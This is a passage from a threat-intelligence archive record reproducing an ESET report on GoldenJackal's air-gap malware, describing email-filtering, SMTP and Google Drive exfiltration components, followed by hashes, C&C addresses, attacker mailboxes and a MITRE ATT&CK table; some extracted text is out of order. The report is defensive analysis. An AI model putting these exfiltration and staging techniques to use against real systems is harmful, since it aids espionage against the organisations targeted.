Contents of update.bat\r\nWe can see that update is run and deleted, along with the batch file, once it’s done running. While we didn’t observe the\r\ncontents of the update component, it is likely that it collects files and stages them in the trash directory on the removable\r\ndrive, since the path to that directory is passed as an argument to update.\r\nWhen GoldenAce finds that the directory trash already exists on a drive, instead of copying files to the drive, it copies files\r\nin the trash directory to C:\\ProgramData\\Microsoft\\Windows\\DeviceMetadataCache.\r\nHTTP server\r\nWe observed Python’s HTTP server, packaged with PyInstaller, being executed via C:\\Windows\\system32\\cmd.exe /K\r\nC:\\Windows\\msahci.cmd. Unfortunately, we didn’t observe the contents of the msahci.cmd file, so we don’t know the\r\narguments passed for execution, such as the port for the server to listen on.\r\nGoldenBlacklist\r\nAs a processing component, GoldenBlacklist downloads an encrypted archive from a local server, and processes email\r\nmessages contained in it, to keep only those of interest. Then it generates a new archive for some other component to\r\nexfiltrate.\r\nThe URL to retrieve the initial archive is hardcoded: https://\u003clocal_ip_address\u003e/update46.zip. The downloaded file is saved\r\nas res.out, and AES decrypted with the hardcoded key\r\nk9ksbu9Q34HBKJuzHIuGTfHL9xCzMl53vguheOYA8SiNoh6Jqe62F7APtQ9pE, using a legitimate OpenSSL executable.\r\nThe decrypted archive, update46.tar.gz, is extracted in memory, and only those files that match certain criteria are written to\r\na subdirectory tmp, in the directory where the malware is running. Criteria:\r\nThe file does not contain any email on a blocklist of email addresses. This is done to remove email messages that\r\ncome from senders that usually are not interesting. 
While we can’t include the full list here, it’s worth mentioning\r\nthat many of the email addresses are related to newsletters and press releases. It’s important to note that the attackers\r\nmust have been operating for some time to build a list like this.\r\nThe file contains the string Content-Type: application. This is to keep email messages that have attachments, such as\r\nPDF files, Microsoft Office files, and archives, to name a few.\r\nOnce the files are selected, GoldenBlacklist archives the tmp directory and encrypts it with openssl.exe, using the same\r\nencryption key as the one used to decrypt the initial archive. The resulting file is archive.out. All intermediate files and\r\nfolders are then deleted, as well as openssl.exe, libssl-3-x64.dll, and libcrypto-3-x64.dll, all located in the malware’s\r\ndirectory. This indicates that another component that we didn’t observe copied those legitimate binaries there in the first\r\nplace.\r\nGoldenPyBlacklist\r\nGoldenPyBlacklist is a Python implementation of GoldenBlacklist. It was packaged with PyInstaller and the original name\r\nof the script is duplxer_black_list_for_external_use.py. 
Some differences to the other component are:\r\nthe initial archive is written as ress.out,\r\nthe key for decryption is the same, except for a different first character,\r\nthe decrypted archive is extracted to the C:\\Windows\\System32\\temp directory for processing,\r\none additional criterion for file selection is added to process only filenames that end in .msg (these are files created\r\nwith Microsoft Outlook),\r\nfiles that do not meet the criteria are deleted,\r\nthe final archive is created with the 7-Zip archiver, and\r\nthe final encrypted file is named ArcSrvcUI.ter.\r\nGoldenMailer\r\nClassified as an exfiltration component, GoldenMailer exfiltrates files by sending emails with attachments to attacker-controlled accounts. It was written in Python and packaged with PyInstaller, and the original name of the script is\r\nsend_to_hole.py. GoldenMailer connects to legitimate servers – either smtp-mail.outlook.com or smtp.office365.com – to\r\nsend email messages, using SMTP on port 587.\r\nThe configuration is read from a file, C:\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.ini, in the same directory\r\nwhere GoldenMailer is running. The configuration consists of the following five lines:\r\nemail address to authenticate to the SMTP server, and to use as both sender and destination address,\r\npassword to authenticate to the SMTP server,\r\npath to directory with archives to exfiltrate,\r\nbase filename (e.g., press.pdf) used for archives to exfiltrate; these archives use the following naming convention:\r\n\u003cbase_filename\u003e.\u003cthree_digit_sequence_number\u003e, and\r\nnumber of files to exfiltrate.\r\nWe noticed that this configuration file was copied from another PC in the local network. Given that the configuration file\r\nindicates how many archives are available to be exfiltrated, we assume that these archives must also be copied over the\r\nnetwork, separating the tasks of collection, distribution, and exfiltration. 
It is likely that the configuration file is generated by\r\nthe component in charge of collecting files and creating archives for exfiltration, but we didn’t observe that component.\r\nFigure 10 shows an example of an email message sent by GoldenMailer. The subject has a typo: it reads Press realese. The\r\nbody is very simple and reads: Daily News about Israel-Hamas war. These strings are hardcoded in the malware’s binary.\r\nOnly one attachment is sent per email; if there are many archives to exfiltrate, one email is sent for each.\r\nFigure 10. Example of an email message used to exfiltrate files\r\nThe configuration files that we observed contained the following email addresses:\r\nmariaalpane@outlook[.]com\r\nkatemarien087@outlook[.]com\r\nspanosmitsotakis@outlook[.]com\r\nGoldenDrive\r\nAs opposed to GoldenMailer, this component exfiltrates files by uploading them to Google Drive. Necessary credentials are\r\nfound in two files, which are hardcoded in the malware: credentials.json, which contains fields such as client_id and\r\nclient_secret, and token.json, with fields such as access_token and refresh_token. A reference to Google Drive’s API and\r\nsome code snippets in the Go programming language can be found here.\r\nSimilar to GoldenMailer, this component can upload only one file at a time. GoldenDrive is executed with an argument that\r\nprovides the full path to the file to upload.\r\nConclusion\r\nIn this blogpost, we revealed two new toolsets used by the GoldenJackal APT group to target air-gapped systems of\r\ngovernmental organizations, including those in Europe. 
Common functionalities include the use of USB drives to steal\r\nconfidential documents.\r\nManaging to deploy two separate toolsets for breaching air-gapped networks in only five years shows that GoldenJackal is a\r\nsophisticated threat actor aware of network segmentation used by its targets.\r\nA comprehensive list of indicators of compromise (IoCs) can be found in our GitHub repository.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit\r\nthe ESET Threat Intelligence page.\r\nIoCs\r\nhttps://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\nPage 16 of 21\n\nFiles\r\nSHA-1  Filename  Detection  Descript\r\nDA9562F5268FA61D19648DFF9C6A57FB8AB7B0D7 winaero.exe  Win32/Agent.AGKQ  GoldenD\r\n5F12FFD272AABC0D5D611D18812A196A6EA2FAA9 1102720677 \r\nPython/Agent.ANA \r\nPython/HackTool.Agent.W \r\nPython/Riskware.LdapDump.A \r\nPython/Riskware.Impacket.C \r\nGoldenH\r\n6DE7894F1971FDC1DF8C4E4C2EDCC4F4489353B6 OfficeAutoComplete.exe WinGo/Agent.AAO  GoldenR\r\n7CB7C3E98CAB2226F48BA956D3BE79C52AB62140 prinntfy.dll  WinGo/DataStealer.A  GoldenU\r\n8F722EB29221C6EAEA9A96971D7FB78DAB2AD923 zUpdater.exe  WinGo/Spy.Agent.AH  GoldenU\r\n24FBCEC23E8B4B40FEA188132B0E4A90C65E3FFB fc.exe  WinGo/DataStealer.C  GoldenA\r\nA87CEB21EF88350707F278063D7701BDE0F8B6B7 upgrade  MSIL/Agent.WPJ \r\nJackalWo\r\nsimpler v\r\n9CBE8F7079DA75D738302D7DB7E97A92C4DE5B71 fp.exe  WinGo/Spy.Agent.CA  GoldenB\r\n9083431A738F031AC6E33F0E9133B3080F641D90 fp.exe  Python/TrojanDownloader.Agent.YO GoldenP\r\nC830EFD843A233C170285B4844C5960BA8381979 cb.exe  Python/Agent.ALE  GoldenM\r\nF7192914E00DD0CE31DF0911C073F522967C6A97 GoogleUpdate.exe  WinGo/Agent.YH  GoldenD\r\nB2BAA5898505B32DF7FE0A7209FC0A8673726509 fp.exe  Python/Agent.ALF \r\nPython H\r\nserver. 
\r\nNetwork\r\nIP  Domain  Hosting provider  First seen  Details\r\n83.24.9[.]124  N/A  Orange Polska Spolka Akcyjna  2019‑08‑09  Primary C\u0026C server used by GoldenJackal in 2019.\r\n196.29.32[.]210  N/A  UTANDE  2019‑08‑09  Secondary C\u0026C server used by GoldenJackal in 2019.\r\nN/A  assistance[.]uz  N/A  2019‑09‑25  Compromised website used to download malware.\r\nN/A  thehistore[.]com  N/A  2019‑09‑25  Compromised website used as a C\u0026C server.\r\nN/A  xgraphic[.]ro  N/A  2019‑09‑25  Compromised website used as a C\u0026C server.\r\nEmail Addresses\r\nmariaalpane@outlook[.]com\r\nkatemarien087@outlook[.]com\r\nspanosmitsotakis@outlook[.]com\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 15 of the MITRE ATT\u0026CK framework.\r\nTactic  ID  Name  Description\r\nResource Development\r\nT1583.003  Acquire Infrastructure: Virtual Private Server  GoldenJackal probably acquired a VPS server to use as a secondary C\u0026C server for the GoldenDealer malware.\r\nT1583.004  Acquire Infrastructure: Server  GoldenJackal likely acquired a server to use as a primary C\u0026C server for the GoldenDealer malware.\r\nT1584.006  Compromise Infrastructure: Web Services  GoldenJackal has used compromised WordPress sites for C\u0026C infrastructure, used by the JackalControl and JackalSteal malware.\r\nT1587.001  Develop Capabilities: Malware  GoldenJackal develops its own custom malware.\r\nT1585.003  Establish Accounts: Cloud Accounts  GoldenJackal has used Google Drive to store exfiltrated files and legitimate tools.\r\nT1588.002  Obtain Capabilities: Tool  GoldenJackal uses legitimate tools, such as Plink and PsExec, for post-compromise operations.\r\nExecution\r\nT1059.001  Command and Scripting Interpreter: PowerShell  GoldenJackal executed PowerShell scripts to download the JackalControl malware from a compromised WordPress website.\r\nT1059.003  Command and Scripting Interpreter: Windows Command Shell  GoldenAce uses cmd.exe to run a batch script to execute other malicious components.\r\nT1059.006  Command and Scripting Interpreter: Python  GoldenHowl contains various malicious modules that are Python scripts.\r\nT1106  Native API  GoldenDealer can copy and run an executable file with the CreateProcessW API.\r\nT1569.002  System Services: Service Execution  GoldenDealer can run as a service.\r\nT1204.002  User Execution: Malicious File  JackalWorm uses a folder icon to entice a potential victim to launch it.\r\nPersistence\r\nT1543.003  Create or Modify System Process: Windows Service  GoldenDealer creates the service NetDnsActivatorSharing to persist on a compromised system.\r\nT1547.001  Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder  If GoldenDealer fails to create a service for persistence, an entry in a Run registry key is created instead.\r\nT1053.005  Scheduled Task/Job: Scheduled Task  GoldenHowl creates the scheduled task Microsoft\\Windows\\Multimedia\\SystemSoundsService2 for persistence.\r\nDefense Evasion\r\nT1564.001  Hide Artifacts: Hidden Files and Directories  GoldenDealer modifies the registry so that hidden files and directories are not shown in Windows Explorer. GoldenDealer, GoldenAce, and JackalWorm create hidden folders on USB drives.\r\nT1070.004  Indicator Removal: File Deletion  GoldenAce deletes payloads after they are run. GoldenBlacklist and GoldenPyBlacklist delete intermediate files after the final archives are generated.\r\nT1036.005  Masquerading: Match Legitimate Name or Location  GoldenUsbCopy uses a legitimate Firefox directory C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Mozilla\\Firefox\\ to stage files.\r\nT1036.008  Masquerading: Masquerade File Type  JackalWorm uses a folder icon to disguise itself as a non-executable file.\r\nT1112  Modify Registry  GoldenDealer modifies the registry so that hidden files and directories are not shown in Windows Explorer.\r\nT1027.013  Obfuscated Files or Information: Encrypted/Encoded File  GoldenJackal uses various encryption algorithms in its toolset, such as XOR, Fernet, and AES, to encrypt configuration files and files to be exfiltrated.\r\nCredential Access\r\nT1552.001  Unsecured Credentials: Credentials In Files  GoldenUsbGo looks for files with filenames that are usually associated with credentials.\r\nT1552.004  Unsecured Credentials: Private Keys  GoldenUsbGo looks for files that may contain private keys, such as those with filenames that contain id_rsa.\r\nDiscovery\r\nT1087.001  Account Discovery: Local Account  GoldenDealer collects information about all user accounts on a compromised system.\r\nT1083  File and Directory Discovery  GoldenHowl has a module to generate a listing of files and directories on a compromised system. GoldenUsbCopy and GoldenUsbGo generate a listing of files and directories on a USB drive.\r\nT1046  Network Service Discovery  GoldenHowl can scan a remote system for open ports, and whether the target is vulnerable to EternalBlue malware.\r\nT1120  Peripheral Device Discovery  GoldenDealer and GoldenUsbCopy monitor the insertion of removable drives. GoldenUsbGo and GoldenAce check for various drive letters, to detect attached removable drives.\r\nT1057  Process Discovery  GoldenDealer obtains information about running processes on a compromised system.\r\nT1018  Remote System Discovery  GoldenHowl can scan an IP range to discover other systems.\r\nT1518  Software Discovery  GoldenDealer obtains information about installed programs on a compromised system.\r\nT1082  System Information Discovery  GoldenDealer obtains various information about the operating system and user accounts on a compromised system.\r\nT1016.001  System Network Configuration Discovery: Internet Connection Discovery  GoldenDealer can determine whether a computer is connected to the internet.\r\nT1135  Network Share Discovery  GoldenAce checks a list of drive letters that can include network shares.\r\nLateral Movement\r\nT1210  Exploitation of Remote Services  GoldenHowl can check for a Windows SMB remote code execution vulnerability that can then be exploited for lateral movement.\r\nT1091  Replication Through Removable Media  GoldenDealer copies executables to and from USB drives, to target air-gapped systems. GoldenAce propagates malicious executables via removable drives.\r\nCollection\r\nT1560.002  Archive Collected Data: Archive via Library  GoldenRobo and GoldenUsbCopy archive files to be exfiltrated with the ZIP library.\r\nT1119  Automated Collection  GoldenUsbCopy and GoldenUsbGo automatically stage files for later exfiltration, when a new removable drive is detected.\r\nT1005  Data from Local System  Most tools in GoldenJackal’s toolset collect information and files from the local system.\r\nT1025  Data from Removable Media  GoldenUsbCopy and GoldenUsbGo collect interesting files from removable media. GoldenAce can retrieve staged files from a specific directory on a removable drive. GoldenDealer can retrieve information from compromised systems from a specific directory on a removable drive.\r\nT1074.001  Data Staged: Local Data Staging  Most tools in GoldenJackal’s toolset stage files locally for other components to process or exfiltrate them.\r\nT1114.001  Email Collection: Local Email Collection  GoldenBlacklist and GoldenPyBlacklist process email files that were collected by an unknown component in GoldenJackal’s toolset.\r\nCommand and Control\r\nT1071.001  Application Layer Protocol: Web Protocols  GoldenDealer and GoldenHowl use HTTPS for communication.\r\nT1092  Communication Through Removable Media  GoldenDealer uses removable media to pass executables to air-gapped systems, and information from those systems back to connected systems.\r\nT1132.001  Data Encoding: Standard Encoding  Executable files sent from the C\u0026C server to GoldenDealer are base64 encoded.\r\nT1572  Protocol Tunneling  GoldenHowl can forward messages through an SSH tunnel.\r\nT1090.001  Proxy: Internal Proxy  GoldenHowl can act as a proxy, forwarding packets.\r\nExfiltration\r\nT1041  Exfiltration Over C2 Channel  GoldenHowl exfiltrates files via the same channel used as its C\u0026C.\r\nT1052.001  Exfiltration Over Physical Medium: Exfiltration over USB  GoldenJackal’s toolset provides capabilities to copy files from air-gapped systems and move them to connected systems via USB drives, for exfiltration.\r\nT1567.002  Exfiltration Over Web Service: Exfiltration to Cloud Storage  GoldenDrive exfiltrates files to an attacker-controlled Google Drive account.\r\nT1048.002  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol  GoldenMailer exfiltrates files via SMTP, using STARTTLS on port 587.\r\nSource: https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/\r\n\r\ninformation as well. Figure 2 shows part of the JSON object with the information sent to the C\u0026C server. While all strings are sent as arrays of decimal character codes, for readability we show them as strings in the image. For example, instead of lsass.exe, the value [108, 115, 97, 115, 115, 46, 101, 120, 101] is actually sent.",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/mind-air-gap-goldenjackal-gooses-government-guardrails/"
	],
	"report_names": [
		"mind-air-gap-goldenjackal-gooses-government-guardrails"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a8356cf9-e9d6-4585-8ccf-d30d3efe142b",
			"created_at": "2023-06-23T02:04:34.262059Z",
			"updated_at": "2026-04-10T02:00:04.711064Z",
			"deleted_at": null,
			"main_name": "GoldenJackal",
			"aliases": [],
			"source_name": "ETDA:GoldenJackal",
			"tools": [
				"JackalControl",
				"JackalPerInfo",
				"JackalScreenWatcher",
				"JackalSteal",
				"JackalWorm"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "821cb2ce-472c-438f-943d-19cf23204d9a",
			"created_at": "2023-11-01T02:01:06.683709Z",
			"updated_at": "2026-04-10T02:00:05.39433Z",
			"deleted_at": null,
			"main_name": "MoustachedBouncer",
			"aliases": [
				"MoustachedBouncer"
			],
			"source_name": "MITRE:MoustachedBouncer",
			"tools": [
				"SharpDisco"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7d9d90f3-001e-4adc-8a77-8f93b5d02b01",
			"created_at": "2023-09-07T02:02:47.575324Z",
			"updated_at": "2026-04-10T02:00:04.770856Z",
			"deleted_at": null,
			"main_name": "MoustachedBouncer",
			"aliases": [],
			"source_name": "ETDA:MoustachedBouncer",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0e74afe0-92c3-4fca-93a4-d8e51180e105",
			"created_at": "2023-08-11T02:00:11.229735Z",
			"updated_at": "2026-04-10T02:00:03.37095Z",
			"deleted_at": null,
			"main_name": "MoustachedBouncer",
			"aliases": [],
			"source_name": "MISPGALAXY:MoustachedBouncer",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bacb81f4-18d1-4dcd-b277-65a9dac41b61",
			"created_at": "2023-11-04T02:00:07.680044Z",
			"updated_at": "2026-04-10T02:00:03.390891Z",
			"deleted_at": null,
			"main_name": "GoldenJackal",
			"aliases": [],
			"source_name": "MISPGALAXY:GoldenJackal",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434369,
	"ts_updated_at": 1775792015,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7439fdf6bdddb43015fe67a25183dbcbf270b8aa.pdf",
		"text": "https://archive.orkl.eu/7439fdf6bdddb43015fe67a25183dbcbf270b8aa.txt",
		"img": "https://archive.orkl.eu/7439fdf6bdddb43015fe67a25183dbcbf270b8aa.jpg"
	}
}